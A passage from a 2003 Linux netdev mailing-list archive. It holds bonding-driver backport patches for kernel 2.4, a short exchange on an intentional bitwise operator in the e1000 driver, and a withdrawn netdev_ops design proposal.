GMT Received: from fmsmsxvs042.fm.intel.com (fmsmsxvs042.fm.intel.com [132.233.42.128]) by petasus.sc.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6UH5ri17804 for ; Wed, 30 Jul 2003 17:05:53 GMT Received: from jrslxjul4.npdj.intel.com ([10.12.254.188]) by fmsmsxvs042.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2003073010120523842 ; Wed, 30 Jul 2003 10:12:06 -0700 Content-Type: text/plain; charset="us-ascii" From: Amir Noam To: fubar@us.ibm.com, jgarzik@pobox.com Subject: [PATCH 3/5] [bonding] backport 2.6 changes to 2.4 Date: Wed, 30 Jul 2003 20:07:14 +0300 User-Agent: KMail/1.4.3 Cc: bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200307302007.14989.amir.noam@intel.com> X-archive-position: 4384 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: amir.noam@intel.com Precedence: bulk X-list: netdev Each /proc/net/bondX/info file used to print the data of all the bond devices. Use a proc read entry instead of a get info entry so we can pass the relevant bond device as an argument. The patch looks messier than it really is, since the entire function has one less indentation level now. Amir diff -Nuarp linux-2.4.22-pre9/drivers/net/bonding/bond_main.c linux-2.4.22-pre9-devel/drivers/net/bonding/bond_main.c --- linux-2.4.22-pre9/drivers/net/bonding/bond_main.c Wed Jul 30 19:14:06 2003 +++ linux-2.4.22-pre9-devel/drivers/net/bonding/bond_main.c Wed Jul 30 19:14:07 2003 @@ -564,14 +564,6 @@ static int bond_release(struct net_devic static int bond_release_all(struct net_device *master); static int bond_sethwaddr(struct net_device *master, struct net_device *slave); -/* - * bond_get_info is the interface into the /proc filesystem. This is - * a different interface than the BOND_INFO_QUERY ioctl.
That is done - * through the generic networking ioctl interface, and bond_info_query - * is the internal function which provides that information. - */ -static int bond_get_info(char *buf, char **start, off_t offset, int length); - /* Caller must hold bond->ptrlock for write */ static inline struct slave* bond_assign_current_slave(struct bonding *bond,struct slave *newslave) @@ -3369,131 +3361,136 @@ static struct net_device_stats *bond_get return stats; } -static int bond_get_info(char *buf, char **start, off_t offset, int length) +#ifdef CONFIG_PROC_FS +static int bond_read_proc(char *buf, char **start, off_t off, int count, int *eof, void *data) { - bonding_t *bond = these_bonds; + struct bonding *bond = (struct bonding *) data; int len = 0; - off_t begin = 0; u16 link; slave_t *slave = NULL; + /* make sure the bond won't be taken away */ + read_lock(&dev_base_lock); + len += sprintf(buf + len, "%s\n", version); - while (bond != NULL) { - /* - * This function locks the mutex, so we can't lock it until - * afterwards - */ - link = bond_check_mii_link(bond); + /* + * This function locks the mutex, so we can't lock it until + * afterwards + */ + link = bond_check_mii_link(bond); - len += sprintf(buf + len, "Bonding Mode: %s\n", - bond_mode_name()); + len += sprintf(buf + len, "Bonding Mode: %s\n", + bond_mode_name()); - if ((bond_mode == BOND_MODE_ACTIVEBACKUP) || - (bond_mode == BOND_MODE_TLB) || - (bond_mode == BOND_MODE_ALB)) { - read_lock_bh(&bond->lock); - read_lock(&bond->ptrlock); - if (bond->current_slave != NULL) { - len += sprintf(buf + len, - "Currently Active Slave: %s\n", - bond->current_slave->dev->name); - } - read_unlock(&bond->ptrlock); - read_unlock_bh(&bond->lock); + if ((bond_mode == BOND_MODE_ACTIVEBACKUP) || + (bond_mode == BOND_MODE_TLB) || + (bond_mode == BOND_MODE_ALB)) { + read_lock_bh(&bond->lock); + read_lock(&bond->ptrlock); + if (bond->current_slave != NULL) { + len += sprintf(buf + len, + "Currently Active Slave: %s\n", + 
bond->current_slave->dev->name); } + read_unlock(&bond->ptrlock); + read_unlock_bh(&bond->lock); + } - len += sprintf(buf + len, "MII Status: "); - len += sprintf(buf + len, - link == BMSR_LSTATUS ? "up\n" : "down\n"); - len += sprintf(buf + len, "MII Polling Interval (ms): %d\n", - miimon); - len += sprintf(buf + len, "Up Delay (ms): %d\n", - updelay * miimon); - len += sprintf(buf + len, "Down Delay (ms): %d\n", - downdelay * miimon); - len += sprintf(buf + len, "Multicast Mode: %s\n", - multicast_mode_name()); + len += sprintf(buf + len, "MII Status: "); + len += sprintf(buf + len, + link == BMSR_LSTATUS ? "up\n" : "down\n"); + len += sprintf(buf + len, "MII Polling Interval (ms): %d\n", + miimon); + len += sprintf(buf + len, "Up Delay (ms): %d\n", + updelay * miimon); + len += sprintf(buf + len, "Down Delay (ms): %d\n", + downdelay * miimon); + len += sprintf(buf + len, "Multicast Mode: %s\n", + multicast_mode_name()); - read_lock_bh(&bond->lock); + read_lock_bh(&bond->lock); - if (bond_mode == BOND_MODE_8023AD) { - struct ad_info ad_info; + if (bond_mode == BOND_MODE_8023AD) { + struct ad_info ad_info; - len += sprintf(buf + len, "\n802.3ad info\n"); + len += sprintf(buf + len, "\n802.3ad info\n"); - if (bond_3ad_get_active_agg_info(bond, &ad_info)) { - len += sprintf(buf + len, "bond %s has no active aggregator\n", bond->device->name); - } else { - len += sprintf(buf + len, "Active Aggregator Info:\n"); + if (bond_3ad_get_active_agg_info(bond, &ad_info)) { + len += sprintf(buf + len, "bond %s has no active aggregator\n", bond->device->name); + } else { + len += sprintf(buf + len, "Active Aggregator Info:\n"); - len += sprintf(buf + len, "\tAggregator ID: %d\n", ad_info.aggregator_id); - len += sprintf(buf + len, "\tNumber of ports: %d\n", ad_info.ports); - len += sprintf(buf + len, "\tActor Key: %d\n", ad_info.actor_key); - len += sprintf(buf + len, "\tPartner Key: %d\n", ad_info.partner_key); - len += sprintf(buf + len, "\tPartner Mac Address: 
%02x:%02x:%02x:%02x:%02x:%02x\n", - ad_info.partner_system[0], - ad_info.partner_system[1], - ad_info.partner_system[2], - ad_info.partner_system[3], - ad_info.partner_system[4], - ad_info.partner_system[5]); - } + len += sprintf(buf + len, "\tAggregator ID: %d\n", ad_info.aggregator_id); + len += sprintf(buf + len, "\tNumber of ports: %d\n", ad_info.ports); + len += sprintf(buf + len, "\tActor Key: %d\n", ad_info.actor_key); + len += sprintf(buf + len, "\tPartner Key: %d\n", ad_info.partner_key); + len += sprintf(buf + len, "\tPartner Mac Address: %02x:%02x:%02x:%02x:%02x:%02x\n", + ad_info.partner_system[0], + ad_info.partner_system[1], + ad_info.partner_system[2], + ad_info.partner_system[3], + ad_info.partner_system[4], + ad_info.partner_system[5]); } + } - for (slave = bond->prev; slave != (slave_t *)bond; - slave = slave->prev) { - len += sprintf(buf + len, "\nSlave Interface: %s\n", slave->dev->name); - - len += sprintf(buf + len, "MII Status: "); - - len += sprintf(buf + len, - slave->link == BOND_LINK_UP ? - "up\n" : "down\n"); - len += sprintf(buf + len, "Link Failure Count: %d\n", - slave->link_failure_count); - - if (app_abi_ver >= 1) { - len += sprintf(buf + len, - "Permanent HW addr: %02x:%02x:%02x:%02x:%02x:%02x\n", - slave->perm_hwaddr[0], - slave->perm_hwaddr[1], - slave->perm_hwaddr[2], - slave->perm_hwaddr[3], - slave->perm_hwaddr[4], - slave->perm_hwaddr[5]); - } + for (slave = bond->prev; slave != (slave_t *)bond; + slave = slave->prev) { + len += sprintf(buf + len, "\nSlave Interface: %s\n", slave->dev->name); - if (bond_mode == BOND_MODE_8023AD) { - struct aggregator *agg = SLAVE_AD_INFO(slave).port.aggregator; + len += sprintf(buf + len, "MII Status: "); - if (agg) { - len += sprintf(buf + len, "Aggregator ID: %d\n", - agg->aggregator_identifier); - } else { - len += sprintf(buf + len, "Aggregator ID: N/A\n"); - } - } - } - read_unlock_bh(&bond->lock); + len += sprintf(buf + len, + slave->link == BOND_LINK_UP ? 
+ "up\n" : "down\n"); + len += sprintf(buf + len, "Link Failure Count: %d\n", + slave->link_failure_count); - /* - * Figure out the calcs for the /proc/net interface - */ - *start = buf + (offset - begin); - len -= (offset - begin); - if (len > length) { - len = length; - } - if (len < 0) { - len = 0; + if (app_abi_ver >= 1) { + len += sprintf(buf + len, + "Permanent HW addr: %02x:%02x:%02x:%02x:%02x:%02x\n", + slave->perm_hwaddr[0], + slave->perm_hwaddr[1], + slave->perm_hwaddr[2], + slave->perm_hwaddr[3], + slave->perm_hwaddr[4], + slave->perm_hwaddr[5]); } + if (bond_mode == BOND_MODE_8023AD) { + struct aggregator *agg = SLAVE_AD_INFO(slave).port.aggregator; - bond = bond->next_bond; + if (agg) { + len += sprintf(buf + len, "Aggregator ID: %d\n", + agg->aggregator_identifier); + } else { + len += sprintf(buf + len, "Aggregator ID: N/A\n"); + } + } } + read_unlock_bh(&bond->lock); + + /* + * Figure out the calcs for the /proc/net interface + */ + if (len <= off + count) { + *eof = 1; + } + *start = buf + off; + len -= off; + if (len > count) { + len = count; + } + if (len < 0) { + len = 0; + } + + read_unlock(&dev_base_lock); + return len; } +#endif /* CONFIG_PROC_FS */ static int bond_event(struct notifier_block *this, unsigned long event, void *ptr) @@ -3655,9 +3652,11 @@ static int __init bond_init(struct net_d kfree(bond); return -ENOMEM; } + bond->bond_proc_dir->owner = THIS_MODULE; + bond->bond_proc_info_file = - create_proc_info_entry("info", 0, bond->bond_proc_dir, - bond_get_info); + create_proc_read_entry("info", 0, bond->bond_proc_dir, + bond_read_proc, bond); if (bond->bond_proc_info_file == NULL) { printk(KERN_ERR "%s: Cannot init /proc/net/%s/info\n", dev->name, dev->name); @@ -3666,6 +3665,7 @@ static int __init bond_init(struct net_d kfree(bond); return -ENOMEM; } + bond->bond_proc_info_file->owner = THIS_MODULE; #endif /* CONFIG_PROC_FS */ if (first_pass == 1) { From amir.noam@intel.com Wed Jul 30 10:07:30 2003 Received: with ECARTIS (v1.0.0; 
list netdev); Wed, 30 Jul 2003 10:07:34 -0700 (PDT) Received: from hermes.sc.intel.com (fmr03.intel.com [143.183.121.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UH7UFl016495 for ; Wed, 30 Jul 2003 10:07:30 -0700 Received: from petasus.sc.intel.com (petasus.sc.intel.com [10.3.253.4]) by hermes.sc.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6UH32t24747 for ; Wed, 30 Jul 2003 17:03:02 GMT Received: from fmsmsxvs042.fm.intel.com (fmsmsxvs042.fm.intel.com [132.233.42.128]) by petasus.sc.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6UH5xi17895 for ; Wed, 30 Jul 2003 17:05:59 GMT Received: from jrslxjul4.npdj.intel.com ([10.12.254.188]) by fmsmsxvs042.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2003073010121124464 ; Wed, 30 Jul 2003 10:12:12 -0700 Content-Type: text/plain; charset="us-ascii" From: Amir Noam To: fubar@us.ibm.com, jgarzik@pobox.com Subject: [PATCH 4/5] [bonding] backport 2.6 changes to 2.4 Date: Wed, 30 Jul 2003 20:07:21 +0300 User-Agent: KMail/1.4.3 Cc: bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200307302007.21369.amir.noam@intel.com> X-archive-position: 4385 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: amir.noam@intel.com Precedence: bulk X-list: netdev Backported from 2.6: Don't dynamically allocate a net_device_stats structure for each bond, instead allocate it with the bonding structure. Since they are always allocated together anyway, we might as well put the stats struct within the bond. 
Amir diff -Nuarp linux-2.4.22-pre9/drivers/net/bonding/bond_main.c linux-2.4.22-pre9-devel/drivers/net/bonding/bond_main.c --- linux-2.4.22-pre9/drivers/net/bonding/bond_main.c Wed Jul 30 19:14:08 2003 +++ linux-2.4.22-pre9-devel/drivers/net/bonding/bond_main.c Wed Jul 30 19:14:09 2003 @@ -3319,10 +3319,10 @@ static int bond_xmit_activebackup(struct static struct net_device_stats *bond_get_stats(struct net_device *dev) { bonding_t *bond = dev->priv; - struct net_device_stats *stats = bond->stats, *sstats; + struct net_device_stats *stats = &(bond->stats), *sstats; slave_t *slave; - memset(bond->stats, 0, sizeof(struct net_device_stats)); + memset(stats, 0, sizeof(struct net_device_stats)); read_lock_bh(&bond->lock); @@ -3560,13 +3560,6 @@ static int __init bond_init(struct net_d /* initialize rwlocks */ rwlock_init(&bond->lock); rwlock_init(&bond->ptrlock); - - bond->stats = kmalloc(sizeof(struct net_device_stats), GFP_KERNEL); - if (bond->stats == NULL) { - kfree(bond); - return -ENOMEM; - } - memset(bond->stats, 0, sizeof(struct net_device_stats)); bond->next = bond->prev = (slave_t *)bond; bond->current_slave = NULL; @@ -3597,7 +3590,6 @@ static int __init bond_init(struct net_d break; default: printk(KERN_ERR "Unknown bonding mode %d\n", bond_mode); - kfree(bond->stats); kfree(bond); return -EINVAL; } @@ -3648,7 +3640,6 @@ static int __init bond_init(struct net_d if (bond->bond_proc_dir == NULL) { printk(KERN_ERR "%s: Cannot init /proc/net/%s/\n", dev->name, dev->name); - kfree(bond->stats); kfree(bond); return -ENOMEM; } @@ -3661,7 +3652,6 @@ static int __init bond_init(struct net_d printk(KERN_ERR "%s: Cannot init /proc/net/%s/info\n", dev->name, dev->name); remove_proc_entry(dev->name, proc_net); - kfree(bond->stats); kfree(bond); return -ENOMEM; } @@ -4004,9 +3994,8 @@ static void __exit bonding_exit(void) remove_proc_entry(dev_bond->name, proc_net); #endif unregister_netdev(dev_bond); - kfree(bond->stats); kfree(dev_bond->priv); - + dev_bond->priv = NULL; 
dev_bond++; } diff -Nuarp linux-2.4.22-pre9/drivers/net/bonding/bonding.h linux-2.4.22-pre9-devel/drivers/net/bonding/bonding.h --- linux-2.4.22-pre9/drivers/net/bonding/bonding.h Wed Jul 30 19:14:08 2003 +++ linux-2.4.22-pre9-devel/drivers/net/bonding/bonding.h Wed Jul 30 19:14:09 2003 @@ -99,7 +99,7 @@ typedef struct bonding { rwlock_t ptrlock; struct timer_list mii_timer; struct timer_list arp_timer; - struct net_device_stats *stats; + struct net_device_stats stats; #ifdef CONFIG_PROC_FS struct proc_dir_entry *bond_proc_dir; struct proc_dir_entry *bond_proc_info_file; From amir.noam@intel.com Wed Jul 30 10:06:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 10:06:48 -0700 (PDT) Received: from hermes.sc.intel.com (fmr03.intel.com [143.183.121.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UH6iFl016213 for ; Wed, 30 Jul 2003 10:06:44 -0700 Received: from petasus.sc.intel.com (petasus.sc.intel.com [10.3.253.4]) by hermes.sc.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6UH2Ft24229 for ; Wed, 30 Jul 2003 17:02:16 GMT Received: from fmsmsxvs042.fm.intel.com (fmsmsxvs042.fm.intel.com [132.233.42.128]) by petasus.sc.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6UH5Ci17241 for ; Wed, 30 Jul 2003 17:05:12 GMT Received: from jrslxjul4.npdj.intel.com ([10.12.254.188]) by fmsmsxvs042.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2003073010112309946 ; Wed, 30 Jul 2003 10:11:24 -0700 Content-Type: text/plain; charset="us-ascii" From: Amir Noam To: fubar@us.ibm.com, jgarzik@pobox.com Subject: [PATCH 0/5] [bonding] backport 2.6 changes to 2.4 Date: Wed, 30 Jul 2003 20:06:32 +0300 User-Agent: KMail/1.4.3 Cc: bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200307302006.32692.amir.noam@intel.com> X-archive-position: 4381 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com 
Errors-to: netdev-bounce@oss.sgi.com X-original-sender: amir.noam@intel.com Precedence: bulk X-list: netdev Hello, The following patches backport recent changes in the bonding code from 2.6 to 2.4, while fixing a few bugs (some from 2.4, some from 2.6). Patches apply on 2.4.22-pre9. 1 - Add list_for_each_entry_safe() 2 - Export alloc_netdev() 3 - Fix /proc read function 4 - Put the bond's net_device_stats inside the bond struct 5 - Use a linked list to handle numerous bond devices Amir From lunz@reflexsecurity.com Wed Jul 30 10:21:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 10:21:20 -0700 (PDT) Received: from crown.reflexsecurity.com ([69.15.40.52]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UHLEFl020471 for ; Wed, 30 Jul 2003 10:21:15 -0700 Received: from stoli.localnet ([192.168.0.106]) by crown.reflexsecurity.com with smtp (Exim 3.35 #1 (Debian)) id 19hueB-0006Kd-00; Wed, 30 Jul 2003 13:21:55 -0400 Received: by stoli.localnet (sSMTP sendmail emulation); Wed, 30 Jul 2003 13:21:10 -0400 From: "Jason Lunz" Date: Wed, 30 Jul 2003 13:21:10 -0400 To: scott.feldman@intel.com Cc: netdev@oss.sgi.com Subject: e1000 typo? Message-ID: <20030730172110.GA13929@reflexsecurity.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-archive-position: 4387 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: lunz@reflexsecurity.com Precedence: bulk X-list: netdev The diff between the 5.1.11 and the newest e1000 drivers has this hunk: @@ -1999,7 +1996,7 @@ } #else for(i = 0; i < E1000_MAX_INTR; i++) - if(!e1000_clean_rx_irq(adapter) && + if(!e1000_clean_rx_irq(adapter) & !e1000_clean_tx_irq(adapter)) break; #endif is that intentional? I don't think it changes the code behavior, but it doesn't look right. 
-- Jason Lunz Reflex Security lunz@reflexsecurity.com http://www.reflexsecurity.com/ From scott.feldman@intel.com Wed Jul 30 11:24:24 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 11:24:29 -0700 (PDT) Received: from hermes.jf.intel.com (fmr05.intel.com [134.134.136.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UIOOFl024812 for ; Wed, 30 Jul 2003 11:24:24 -0700 Received: from petasus.jf.intel.com (petasus.jf.intel.com [10.7.209.6]) by hermes.jf.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6UIMCL20777 for ; Wed, 30 Jul 2003 18:22:12 GMT Received: from orsmsxvs041.jf.intel.com (orsmsxvs041.jf.intel.com [192.168.65.54]) by petasus.jf.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6UIJMZ28437 for ; Wed, 30 Jul 2003 18:19:22 GMT Received: from orsmsx332.amr.corp.intel.com ([192.168.65.60]) by orsmsxvs041.jf.intel.com (NAVGW 2.5.2.11) with SMTP id M2003073011241810470 ; Wed, 30 Jul 2003 11:24:18 -0700 Received: from orsmsx402.amr.corp.intel.com ([192.168.65.208]) by orsmsx332.amr.corp.intel.com with Microsoft SMTPSVC(5.0.2195.5329); Wed, 30 Jul 2003 11:24:17 -0700 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Subject: RE: e1000 typo? X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0 Date: Wed, 30 Jul 2003 11:24:17 -0700 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: e1000 typo? 
Thread-Index: AcNWvvrz6ZMxsjO8S528qn3AP1oZ3QACIglg From: "Feldman, Scott" To: "Jason Lunz" Cc: X-OriginalArrivalTime: 30 Jul 2003 18:24:18.0008 (UTC) FILETIME=[C9C46D80:01C356C7] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6UIOOFl024812 X-archive-position: 4388 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: scott.feldman@intel.com Precedence: bulk X-list: netdev > is that intentional? I don't think it changes the code > behavior, but it doesn't look right. It's intentional because && stops evaluating if left op is false which means we would leave Tx cleanup work when there was no Rx work. -scott From lunz@reflexsecurity.com Wed Jul 30 11:29:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 11:29:14 -0700 (PDT) Received: from crown.reflexsecurity.com ([69.15.40.52]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UITAFl025192 for ; Wed, 30 Jul 2003 11:29:10 -0700 Received: from stoli.localnet ([192.168.0.106]) by crown.reflexsecurity.com with smtp (Exim 3.35 #1 (Debian)) id 19hvhu-0006R9-00; Wed, 30 Jul 2003 14:29:50 -0400 Received: by stoli.localnet (sSMTP sendmail emulation); Wed, 30 Jul 2003 14:29:06 -0400 From: "Jason Lunz" Date: Wed, 30 Jul 2003 14:29:06 -0400 To: "Feldman, Scott" Cc: netdev@oss.sgi.com Subject: Re: e1000 typo? 
Message-ID: <20030730182906.GA14121@reflexsecurity.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.28i X-archive-position: 4389 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: lunz@reflexsecurity.com Precedence: bulk X-list: netdev On Wed, Jul 30, 2003 at 11:24AM -0700, Feldman, Scott wrote: > It's intentional because && stops evaluating if left op is false which > means we would leave Tx cleanup work when there was no Rx work. ah. subtle yet obvious. :P -- Jason Lunz Reflex Security lunz@reflexsecurity.com http://www.reflexsecurity.com/ From willy@www.linux.org.uk Wed Jul 30 11:44:19 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 11:44:24 -0700 (PDT) Received: from www.linux.org.uk (IDENT:T5crCEYXo9ZONq9s/AfxeCCkK3uZubPx@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UIiHFl026454 for ; Wed, 30 Jul 2003 11:44:18 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19hvvs-0004Wg-5I for netdev@oss.sgi.com; Wed, 30 Jul 2003 19:44:16 +0100 Date: Wed, 30 Jul 2003 19:44:16 +0100 From: Matthew Wilcox To: netdev@oss.sgi.com Subject: netdev_ops retraction Message-ID: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4.1i X-archive-position: 4390 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev So I've prototyped netdev_ops over a few drivers, and I don't like it. 
Here's why I don't like it: +struct netdev_ops { + struct net_device_stats * (*get_stats)(struct net_device *dev); + void (*uninit)(struct net_device *dev); + void (*destructor)(struct net_device *dev); + int (*open)(struct net_device *dev); + int (*stop)(struct net_device *dev); + int (*hard_start_xmit)(struct sk_buff *skb, struct net_device *dev); + int (*poll)(struct net_device *dev, int *quota); + int (*hard_header)(struct sk_buff *skb, struct net_device *dev, + unsigned short type, void *daddr, + void *saddr, unsigned len); + int (*rebuild_header)(struct sk_buff *skb); + void (*set_multicast_list)(struct net_device *dev); + int (*set_mac_address)(struct net_device *dev, void *addr); + int (*do_ioctl)(struct net_device *dev, struct ifreq *ifr, int cmd); + int (*set_config)(struct net_device *dev, struct ifmap *map); + int (*hard_header_cache)(struct neighbour *neigh, struct hh_cache *hh); + void (*header_cache_update)(struct hh_cache *hh, + struct net_device *dev, unsigned char * haddr); + int (*change_mtu)(struct net_device *dev, int new_mtu); + void (*tx_timeout)(struct net_device *dev); + void (*vlan_rx_register)(struct net_device *dev, struct vlan_group *grp); + void (*vlan_rx_add_vid)(struct net_device *dev, unsigned short vid); + void (*vlan_rx_kill_vid)(struct net_device *dev, unsigned short vid); + int (*hard_header_parse)(struct sk_buff *skb, unsigned char *haddr); + int (*neigh_setup)(struct net_device *dev, struct neigh_parms *); + int (*accept_fastpath)(struct net_device *, struct dst_entry*); + + int (*get_settings)(struct net_device *, struct ethtool_cmd *); + int (*set_settings)(struct net_device *, struct ethtool_cmd *); + void (*get_drvinfo)(struct net_device *, struct ethtool_drvinfo *); + int (*get_regs_len)(struct net_device *); + void (*get_regs)(struct net_device *, struct ethtool_regs *, void *); + void (*get_wol)(struct net_device *, struct ethtool_wolinfo *); + int (*set_wol)(struct net_device *, struct ethtool_wolinfo *); + u32 
(*get_msglevel)(struct net_device *); + void (*set_msglevel)(struct net_device *, u32); + int (*nway_reset)(struct net_device *); + u32 (*get_link)(struct net_device *); + int (*get_eeprom)(struct net_device *, u32 offset, u32 len, u8 *, u32 magic); + int (*set_eeprom)(struct net_device *, u32 offset, u32 len, u8 *, u32 magic); + int (*get_coalesce)(struct net_device *, struct ethtool_coalesce *); + int (*set_coalesce)(struct net_device *, struct ethtool_coalesce *); + void (*get_ringparam)(struct net_device *, struct ethtool_ringparam *); + int (*set_ringparam)(struct net_device *, struct ethtool_ringparam *); + void (*get_pauseparam)(struct net_device *, struct ethtool_pauseparam *); + int (*set_pauseparam)(struct net_device *, struct ethtool_pauseparam *); + u32 (*get_rx_csum)(struct net_device *); + int (*set_rx_csum)(struct net_device *, u32); + u32 (*get_tx_csum)(struct net_device *); + int (*set_tx_csum)(struct net_device *, u32); + u32 (*get_sg)(struct net_device *); + int (*set_sg)(struct net_device *, u32); + int (*self_test_count)(struct net_device *); + void (*self_test)(struct net_device *, struct ethtool_test *, u64 *); + void (*get_strings)(struct net_device *, u32 stringset, u8 *); + int (*phys_id)(struct net_device *, u32); + int (*get_stats_count)(struct net_device *); + void (*get_ethtool_stats)(struct net_device *, struct ethtool_stats *, u64 *); +}; Never mind the additional pointer dereference in the code, this is just a horribly large data structure. Unless someone convinces me otherwise, I'm going to drop this idea and revert to doing ethtool_ops as a separate data structure. I think there's still scope for a netdev_ops patch, but it's of dubious value and more of a 2.7 project. -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" 
-- Robert Fisk From garzik@gtf.org Wed Jul 30 11:50:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 11:50:15 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UIo9Fl027912 for ; Wed, 30 Jul 2003 11:50:12 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id 673406671; Wed, 30 Jul 2003 14:50:03 -0400 (EDT) Date: Wed, 30 Jul 2003 14:50:03 -0400 From: Jeff Garzik To: Matthew Wilcox Cc: netdev@oss.sgi.com Subject: Re: netdev_ops retraction Message-ID: <20030730185003.GA9253@gtf.org> References: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> User-Agent: Mutt/1.3.28i X-archive-position: 4391 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Wed, Jul 30, 2003 at 07:44:16PM +0100, Matthew Wilcox wrote: > Never mind the additional pointer dereference in the code, this is just > a horribly large data structure. Unless someone convinces me otherwise, > I'm going to drop this idea and revert to doing ethtool_ops as a separate > data structure. I think there's still scope for a netdev_ops patch, > but it's of dubious value and more of a 2.7 project. Definitely OK with me. And I think this is probably the best route for the moment, especially. 
Jeff From shemminger@osdl.org Wed Jul 30 12:51:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 12:51:51 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UJpmFl000806 for ; Wed, 30 Jul 2003 12:51:49 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6UJpZI08478; Wed, 30 Jul 2003 12:51:35 -0700 Date: Wed, 30 Jul 2003 12:51:35 -0700 From: Stephen Hemminger To: "David S. Miller" Cc: netdev@oss.sgi.com Subject: [PATCH] export correct symbols when INET not enabled Message-Id: <20030730125135.6b5d1945.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4392 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Several symbols relating to multicast and netlink were hidden incorrectly under CONFIG_INET when in fact they are needed now by drivers and available even without TCP/IP. 
